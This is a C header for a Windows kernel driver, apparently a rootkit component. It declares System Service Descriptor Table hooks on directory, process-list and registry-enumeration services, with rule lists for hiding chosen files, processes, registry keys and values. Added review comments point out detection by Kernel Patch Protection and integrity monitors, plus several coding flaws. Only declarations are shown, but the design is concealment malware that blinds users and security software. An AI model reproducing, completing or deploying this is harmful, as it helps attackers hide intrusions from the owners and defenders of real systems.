

#ifndef _HOOKPORT0123456789_
#define _HOOKPORT0123456789_
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ndis.h>
#include "timeandproc.h"

#pragma pack(1)
/*
 * Local mirror of one System Service Descriptor Table (SSDT) entry as exported
 * by the kernel. Byte-packed so the field offsets match the kernel's own
 * structure rather than the compiler's default alignment.
 */
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;          // table of system-service entry points, indexed by service number
unsigned int *ServiceCounterTableBase;   // used only in checked builds
unsigned int NumberOfServices;           // entry count of ServiceTableBase
unsigned char *ParamTableBase;           // presumably the per-service argument byte-count table — verify
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
#pragma pack()
// NOTE(review): KeServiceDescriptorTable is an x86-only kernel export; 64-bit kernels do not export it
// and Kernel Patch Protection reverts or bugchecks on runtime SSDT modification. Integrity monitors that
// compare ServiceTableBase against the on-disk kernel image will flag any slot redirected through this.
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;


/******************************************驱动处理函数********************************************/
// Driver entry points; declared here, defined elsewhere in the driver.
void DriverUnload(IN PDRIVER_OBJECT DriverObject);                         // unload routine
NTSTATUS DriverIoControl(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);   // device-control (IOCTL) handler
// Major-function dispatch routine.
NTSTATUS
DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp);

/******************************************文件隐藏相关********************************************/
/*
 * Local copy of the FileBothDirectoryInformation record that
 * ZwQueryDirectoryFile writes into the caller's buffer. Field order and
 * types follow the public DDK definition.
 */
typedef struct _FILE_BOTH_DIR_INFORMATION {
ULONG NextEntryOffset;        // byte offset from this record to the next one in the buffer
ULONG FileIndex;
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
LARGE_INTEGER EndOfFile;
LARGE_INTEGER AllocationSize;
ULONG FileAttributes;
ULONG FileNameLength;         // byte length of FileName (not a character count)
ULONG EaSize;
CCHAR ShortNameLength;
WCHAR ShortName[12];
// Variable-length trailer sized by FileNameLength; [1] is the DDK idiom for a
// flexible member. NOTE(review): any walker of these records must bound both
// NextEntryOffset and FileNameLength by the buffer length it was given.
WCHAR FileName[1];
} FILE_BOTH_DIR_INFORMATION, *PFILE_BOTH_DIR_INFORMATION;// mirrors the DDK layout

// Prototype of the system service to be hooked (directory enumeration).
NTSYSAPI NTSTATUS NTAPI ZwQueryDirectoryFile(
IN HANDLE hFile,                              // open directory handle
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,              // receives FILE_*_INFORMATION records
IN ULONG FileInformationBufferLength,         // size of FileInformationBuffer in bytes
IN FILE_INFORMATION_CLASS FileInfoClass,      // selects which record layout is returned
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

// Function-pointer type with the same signature as ZwQueryDirectoryFile.
// NOTE(review): the pointer type carries no NTAPI (__stdcall); it only matches the
// kernel export if the build's default calling convention is __stdcall (x86 DDK /Gz) — verify.
typedef NTSTATUS (*REALZWQUERYDIRECTORYFILE)(IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

// Saved original entry point of ZwQueryDirectoryFile.
// NOTE(review): this is a definition (not `extern`) placed in a header; including this header
// from more than one translation unit produces duplicate symbols at link time. The same applies
// to every Real*/m_*/t_* global defined in this file.
REALZWQUERYDIRECTORYFILE RealZwQueryDirectoryFile;

// Prototype of the replacement routine that takes ZwQueryDirectoryFile's place.
// Parameters mirror ZwQueryDirectoryFile exactly so the slot swap is signature-compatible.
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery);

/* Names of the files to hide (raw byte buffer; its internal format is decided by the consumer). */
PUCHAR m_FileHideInfo = NULL;

/* Number of file-hide rules currently held. */
ULONG m_FileRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for one file-hide rule (a singly linked list node).
// NOTE(review): if these nodes arrive from user mode through DriverIoControl, `rule` must not be
// assumed NUL-terminated and `_next` is an untrusted pointer that must be probed/copied, never
// followed directly in kernel mode.
typedef struct _FileHideRule{
char rule[256];// file name to hide (fixed 256-byte buffer)
struct _FileHideRule *_next;// next rule in the list
} FILEHIDERULE, *PFILEHIDERULE;

// Add / remove a file-hide rule. Returns a UCHAR status whose meaning is defined by the implementation.
UCHAR AddFileCtrlInfo(PFILEHIDERULE FileRule);
UCHAR DelFileCtrlInfo(PFILEHIDERULE FileRule);

/******************************************进程隐藏相关********************************************/
/*
 * Per-thread record embedded in the SystemProcessInformation buffer.
 * NOTE(review): this is an undocumented, version-specific layout; if it does
 * not match the running kernel, every field read from it is silently wrong.
 */
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;          // (sic) presumably ClientId — process/thread id pair
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};

/*
 * Per-process record returned by ZwQuerySystemInformation for the process
 * list. Records are chained by NextEntryDelta and each is followed by
 * ThreadCount _SYSTEM_THREADS entries (Threads[1] is the flexible-member idiom).
 * NOTE(review): undocumented layout that differs across Windows versions;
 * a walker must bound NextEntryDelta by the buffer length it received.
 */
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;              // byte offset to the next record; 0 presumably ends the list — verify
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;        // image name; Length is in bytes and the buffer need not be NUL-terminated
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;      // parent process id
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};

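// Prototype of the system service to be hooked (system/process information query).
// The third parameter was spelled "SystemInformaitonLength"; corrected here and in the
// matching typedef and hook prototype below (parameter names in prototypes do not bind callers).
NTSYSAPI NTSTATUS NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,      // information class selecting the record type
IN OUT PVOID SystemInformation,       // caller buffer that receives the records
IN ULONG SystemInformationLength,     // size of SystemInformation in bytes
OUT PULONG ReturnLength OPTIONAL);    // bytes written or required

// Function-pointer type with the same signature as ZwQuerySystemInformation.
// NOTE(review): no NTAPI on the pointer type; relies on the build defaulting to __stdcall — verify.
typedef NTSTATUS (*REALZWQUERYSYSTEMINFORMATION)(IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);

// Saved original entry point of ZwQuerySystemInformation.
// NOTE(review): a definition in a header; duplicate symbols if included from more than one translation unit.
REALZWQUERYSYSTEMINFORMATION RealZwQuerySystemInformation;

// Prototype of the replacement routine that takes ZwQuerySystemInformation's place.
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);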

/* Names of the processes to hide (raw byte buffer; format decided by the consumer). */
PUCHAR m_ProcessHideInfo = NULL;

/* Number of process-hide rules currently held. */
ULONG m_ProcessRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for one process-hide rule (a singly linked list node).
// NOTE(review): if supplied from user mode, `rule` is not guaranteed NUL-terminated and `_next`
// is an untrusted pointer that must be probed/copied before use in kernel mode.
typedef struct _ProcessHideRule{
char rule[256];// process name to hide (fixed 256-byte buffer)
struct _ProcessHideRule *_next;// next rule in the list
} PROCESSHIDERULE, *PPROCESSHIDERULE;

// Add / remove a process-hide rule. Returns a UCHAR status defined by the implementation.
UCHAR AddProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);
UCHAR DelProcessCtrlInfo(PPROCESSHIDERULE ProcessRule);

/******************************************注册表项隐藏相关********************************************/
// Prototype of the system service to be hooked (registry subkey enumeration).
NTSYSAPI NTSTATUS NTAPI ZwEnumerateKey(
IN HANDLE KeyHandle,                              // open registry key
IN ULONG Index,                                   // subkey index
IN KEY_INFORMATION_CLASS KeyInformationClass,     // selects the KEY_*_INFORMATION record type
OUT PVOID KeyInformation,                         // caller buffer receiving the record
IN ULONG Length,                                  // size of KeyInformation in bytes
OUT PULONG ResultLength);                         // bytes written or required

// Function-pointer type with the same signature as ZwEnumerateKey
// (the original comment mislabelled it as ZwQuerySystemInformation).
typedef NTSTATUS (*REALZWENUMERATEKEY)(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength);

// Saved original entry point of ZwEnumerateKey (definition in a header; see duplicate-symbol risk).
REALZWENUMERATEKEY RealZwEnumerateKey;

// Prototype of the replacement routine that takes ZwEnumerateKey's place.
NTSTATUS HookZwEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation,
IN ULONG Length,
OUT PULONG ResultLength);

/* Names of the registry keys to hide (raw byte buffer; format decided by the consumer). */
PUCHAR m_KeyHideInfo = NULL;
/* Number of key-hide rules currently held. */
ULONG m_KeyRuleNum = 0; //add by htr on 2005-06-27

/* Registry key names to hide that exist under a specific parent key. */
PUCHAR t_KeyHideInfo = NULL;
/* Number of such parent-scoped key-hide rules. */
ULONG t_KeyRuleNum = 0; //add by htr on 2005-06-27

// Transfer format for one registry-key-hide rule (a singly linked list node).
// NOTE(review): if supplied from user mode, `rule` is not guaranteed NUL-terminated and `_next`
// is an untrusted pointer that must be probed/copied before use in kernel mode.
typedef struct _KeyHideRule{
char rule[256];// registry key name to hide (the original comment said "file name"; fixed 256-byte buffer)
struct _KeyHideRule *_next;// next rule in the list
} KEYHIDERULE, *PKEYHIDERULE;

// Add / remove a registry-key-hide rule. Returns a UCHAR status defined by the implementation.
UCHAR AddKeyCtrlInfo(PKEYHIDERULE KeyRule);
UCHAR DelKeyCtrlInfo(PKEYHIDERULE KeyRule);

/******************************************注册表键值隐藏相关********************************************/
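// Prototype of the system service to be hooked (registry value enumeration).
// NTAPI added so this declaration carries the same calling convention as the other
// Zw* prototypes in this header and the kernel export it names; a convention mismatch
// on a hooked slot corrupts the caller's stack.
NTSYSAPI NTSTATUS NTAPI
ZwEnumerateValueKey(
IN HANDLE KeyHandle,                                        // open registry key
IN ULONG Index,                                             // value index
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,    // selects the KEY_VALUE_*_INFORMATION record type
OUT PVOID KeyValueInformation,                              // caller buffer receiving the record
IN ULONG Length,                                            // size of KeyValueInformation in bytes
OUT PULONG ResultLength                                     // bytes written or required
);

// Function-pointer type with the same signature as ZwEnumerateValueKey
// (the original comment mislabelled it as ZwQuerySystemInformation).
// NOTE(review): no NTAPI on the pointer type; relies on the build defaulting to __stdcall — verify.
typedef NTSTATUS (*REALZWENUMERATEVALUEKEY)(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
);

// Saved original entry point of ZwEnumerateValueKey.
// NOTE(review): a definition in a header; duplicate symbols if included from more than one translation unit.
REALZWENUMERATEVALUEKEY RealZwEnumerateValueKey;

// Prototype of the replacement routine that takes ZwEnumerateValueKey's place.
NTSTATUS HookZwEnumerateValueKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
OUT PVOID KeyValueInformation,
IN ULONG Length,
OUT PULONG ResultLength
);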

/* Names of the registry values to hide (raw byte buffer; format decided by the consumer). */
PUCHAR m_ValueHideInfo = NULL;
/* Number of value-hide rules currently held. */
ULONG m_ValueRuleNum = 0; //add by htr on 2005-06-27


// Transfer format for one registry-value-hide rule (a singly linked list node).
// NOTE(review): if supplied from user mode, `rule` is not guaranteed NUL-terminated and `_next`
// is an untrusted pointer that must be probed/copied before use in kernel mode.
typedef struct _ValueHideRule{
char rule[256];// registry value name to hide (the original comment said "file name"; fixed 256-byte buffer)
struct _ValueHideRule *_next;// next rule in the list
} VALUEHIDERULE, *PVALUEHIDERULE;

// Add / remove a registry-value-hide rule. Returns a UCHAR status defined by the implementation.
UCHAR AddValueCtrlInfo(PVALUEHIDERULE ValueRule);
UCHAR DelValueCtrlInfo(PVALUEHIDERULE ValueRule);

#endif